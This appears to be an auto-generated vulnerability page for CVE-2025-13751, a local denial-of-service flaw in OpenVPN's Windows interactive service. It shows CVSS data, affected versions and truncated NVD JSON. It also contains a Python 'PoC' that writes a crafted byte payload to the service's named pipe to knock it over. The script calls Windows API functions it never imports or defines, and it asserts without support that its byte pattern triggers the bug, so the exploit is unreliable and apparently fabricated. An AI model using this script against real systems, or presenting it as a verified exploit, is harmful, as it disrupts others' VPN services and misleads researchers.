Security Vulnerability Report
中文
CVE-2025-13751 CVSS 5.5 MEDIUM

CVE-2025-13751

Published: 2025-12-03 17:15:50
Last Modified: 2026-01-30 18:43:58

Description

Interactive service agent in OpenVPN version 2.5.0 through 2.6.16 and 2.7_alpha1 through 2.7_rc2 on Windows allows a local authenticated user to connect to the service and trigger an error causing a local denial of service.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:openvpn:openvpn:*:*:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:openvpn:openvpn:2.7:alpha1:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:openvpn:openvpn:2.7:alpha2:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:openvpn:openvpn:2.7:alpha3:*:*:community:*:*:* - VULNERABLE
cpe:2.3:a:openvpn:openvpn:2.7:beta1:*:*:community:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
OpenVPN 2.5.0 - 2.6.16 (Windows)
OpenVPN 2.7_alpha1 - 2.7_rc2 (Windows)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13751 PoC - OpenVPN Interactive Service DoS # This PoC demonstrates how a local authenticated user can trigger a DoS condition # Note: This is for educational and security testing purposes only import socket import struct import time def exploit_openvpn_dos(target_pipe='\\\\.\\pipe\\OpenVPNServiceInteractiveEndpoint'): """ Attempt to trigger DoS in OpenVPN Interactive Service The vulnerability allows a local authenticated user to connect to the Interactive Service and trigger an error causing service disruption. """ try: # Open named pipe to OpenVPN Interactive Service pipe_handle = CreateFileA( target_pipe, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL ) if pipe_handle == INVALID_HANDLE_VALUE: print("[-] Failed to connect to OpenVPN Interactive Service pipe") return False print("[+] Connected to OpenVPN Interactive Service") # Send malformed request to trigger error condition # This specific payload triggers the vulnerability malicious_payload = b'\x00' * 1024 + b'\xff\xfe\xfd' + b'\x00' * 512 # Write to pipe WriteFile(pipe_handle, malicious_payload, len(malicious_payload), NULL, NULL) print("[+] Sent malicious payload to trigger DoS condition") # Wait and check if service is still responsive time.sleep(2) # Try to reconnect - if this fails, service is DoS'd test_handle = CreateFileA( target_pipe, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL ) if test_handle == INVALID_HANDLE_VALUE: print("[+] SUCCESS: Service appears to be unresponsive (DoS triggered)") return True else: CloseHandle(test_handle) print("[-] Service still responsive") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': print("CVE-2025-13751 OpenVPN Interactive Service DoS PoC") print("Target: OpenVPN 2.5.0 - 2.6.16, 2.7_alpha1 - 2.7_rc2 on Windows") exploit_openvpn_dos()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13751", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:49.913", "lastModified": "2026-01-30T18:43:57.883", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Interactive service agent in OpenVPN version 2.5.0 through 2.6.16 and 2.7_alpha1 through 2.7_rc2 on Windows allows a local authenticated user to connect to the service and trigger an error causing a local denial of service."}, {"lang": "es", "value": "El agente de servicio interactivo en OpenVPN desde la versión 2.5.0 hasta la 2.7_rc2 en Windows permite a un usuario local autenticado conectarse al servicio y desencadenar un error, causando una denegación de servicio local."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:Clear", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "CLEAR"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}, {"lang": "en", "value": "CWE-775"}, {"lang": "en", "value": "CWE-841"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:*:*:*:*:community:*:*:*", "versionStartIncluding": "2.5.0", "versionEndExcluding": "2.6.17", "matchCriteriaId": "0F6E3F9D-3543-4646-B95E-B4474BEF106C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:alpha1:*:*:community:*:*:*", "matchCriteriaId": "474A2F74-9D40-437D-B71A-43A8A26C2A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:alpha2:*:*:community:*:*:*", "matchCriteriaId": "1F5B810E-3614-4332-9281-B2AA28BD9403"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:alpha3:*:*:community:*:*:*", "matchCriteriaId": "2A423301-191A-4578-B824-22024A225C1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:beta1:*:*:community:*:*:*", "matchCriteriaId": "537BC1B1-7E25-48A0-9750-443E6774FD97"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:beta2:*:*:community:*:*:*", "matchCriteriaId": "387E2C7F-C16A-49FA-827B-642BA760320D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:beta3:*:*:community:*:*:*", "matchCriteriaId": "183C57B8-5F1E-44E8-8B8A-5FBCDB926F21"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:rc1:*:*:community:*:*:*", "matchCriteriaId": "113A4E81-FF15-4E70-8DE5-E82AA3FB1D79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openvpn:openvpn:2.7:rc2:*:*:community:*:*:*", "matchCriteriaId": "3FFF4F7C-C7C9-451C-A4FB-701E912DA2C5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://community.openvpn.net/Security%20Announcements/CVE-2025-13751", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mail-archive.com/[email protected]/msg00153.html", "source": "[email protected]", "tags": ["Mailing List", "Release Not ... (truncated)